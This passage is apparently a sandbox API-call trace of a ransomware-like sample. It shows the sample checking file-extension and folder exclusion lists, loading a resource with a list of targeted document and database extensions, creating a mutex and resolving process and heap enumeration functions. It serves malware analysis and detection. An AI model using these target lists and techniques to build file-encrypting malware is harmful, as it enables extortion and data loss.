lpString1="MSI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_START]", cchCount2=10) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 2 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.889] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_START]", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\WINDOWS", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAM FILES", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\GAMES", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPDATA\\", cchCount1=9, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\APPLICATION DATA\\", cchCount1=18, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LOCAL SETTINGS\\", cchCount1=16, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMP\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PROGRAMDATA\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BOOT\\", cchCount1=6, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MSOCACHE\\", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DEFAULT USER\\", cchCount1=14, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\SAMPLE", cchCount1=7, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\EXAMPLE", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\I386", cchCount1=5, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TEMPORARY", cchCount1=10, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\TOR BROWSER\\", cchCount1=13, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\BROWSER", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BROWSER\\", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 3 [0100.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[ND_END]", cchCount1=8, lpString2="[ND_END]", cchCount2=8) returned 2 [0100.891] GetCurrentThreadId () returned 0xc44 [0100.891] GetCurrentThreadId () returned 0xc44 [0100.892] GetCurrentThreadId () returned 0xc44 [0100.892] FindResourceW (hModule=0x400000, lpName="PRL", lpType=0xa) returned 0x51c498 [0100.892] LoadResource (hModule=0x400000, hResInfo=0x51c498) returned 0x516f58 [0100.892] SizeofResource (hModule=0x400000, hResInfo=0x51c498) returned 0x61 [0100.892] LockResource (hResData=0x516f58) returned 0x516f58 [0100.892] FreeResource (hResData=0x516f58) returned 0 [0100.892] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0100.892] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0100.892] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0100.892] LockResource (hResData=0x50d64c) returned 0x50d64c [0100.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13850b0, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0100.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13850b0, cbMultiByte=38, lpWideCharStr=0x137de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0100.892] FreeResource (hResData=0x50d64c) returned 0 [0100.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0100.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x13850b4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0100.892] GetCurrentThreadId () returned 0xc44 [0100.892] GetCurrentThreadId () returned 0xc44 [0100.892] GetCurrentThreadId () returned 0xc44 [0100.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133ace8, cbMultiByte=97, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 97 [0100.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x133ace8, cbMultiByte=97, lpWideCharStr=0x12f81ec, cchWideChar=97 | out: lpWideCharStr="1CD\r\nDT\r\nDBS\r\nDBF\r\nDBX\r\nMDB\r\nMDF\r\nSDF\r\nACCDB\r\nXLSX\r\nXLS\r\nDOCX\r\nDOC\r\nODS\r\nODT\r\nPDF\r\nJPG\r\nJPEG\r\nTXT") returned 97 [0100.892] CharLowerBuffW (in: lpsz="AST", cchLength=0x3 | out: lpsz="ast") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="AFN", cchLength=0x3 | out: lpsz="afn") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="ELST", cchLength=0x4 | out: lpsz="elst") returned 0x4 [0100.892] CharLowerBuffW (in: lpsz="EXE", cchLength=0x3 | out: lpsz="exe") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="LNK", cchLength=0x3 | out: lpsz="lnk") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="HTA", cchLength=0x3 | out: lpsz="hta") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="PEK", cchLength=0x3 | out: lpsz="pek") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="SEK", cchLength=0x3 | out: lpsz="sek") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="B10CKED", cchLength=0x7 | out: lpsz="b10cked") returned 0x7 [0100.892] CharLowerBuffW (in: lpsz="TMP", cchLength=0x3 | out: lpsz="tmp") returned 0x3 [0100.892] CharLowerBuffW (in: lpsz="ICO", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" [0100.892] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="46Brother2ProcessMutex7") returned 0x0 [0100.893] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="46Brother2ProcessMutex7") returned 0xb8 [0100.893] Sleep (dwMilliseconds=0x12c) [0101.269] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CreateToolhelp32Snapshot", cchWideChar=24, lpMultiByteStr=0x136f63c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateToolhelp32Snapshot", lpUsedDefaultChar=0x0) returned 24 [0101.269] GetProcAddress (hModule=0x76910000, lpProcName="CreateToolhelp32Snapshot") returned 0x7694f731 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListFirst", cchWideChar=15, lpMultiByteStr=0x1352d0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListFirst", lpUsedDefaultChar=0x0) returned 15 [0101.269] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListFirst") returned 0x769a02e7 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32ListNext", cchWideChar=14, lpMultiByteStr=0x1352d0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32ListNext", lpUsedDefaultChar=0x0) returned 14 [0101.269] GetProcAddress (hModule=0x76910000, lpProcName="Heap32ListNext") returned 0x769a0391 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32First", cchWideChar=11, lpMultiByteStr=0x1352d0c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32First", lpUsedDefaultChar=0x0) returned 11 [0101.269] GetProcAddress (hModule=0x76910000, lpProcName="Heap32First") returned 0x769a0429 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0101.269] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Heap32Next", cchWideChar=10, lpMultiByteStr=0x1352d0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Heap32Next", lpUsedDefaultChar=0x0) returned 10 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Heap32Next") returned 0x769a0614 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0101.270] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Toolhelp32ReadProcessMemory", cchWideChar=27, lpMultiByteStr=0x136f63c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Toolhelp32ReadProcessMemory", lpUsedDefaultChar=0x0) returned 27 [0101.270] GetProcAddress (hModule=0x76910000, lpProcName="Toolhelp32ReadProcessMemory") returned 0x769a0819 [0101.270] 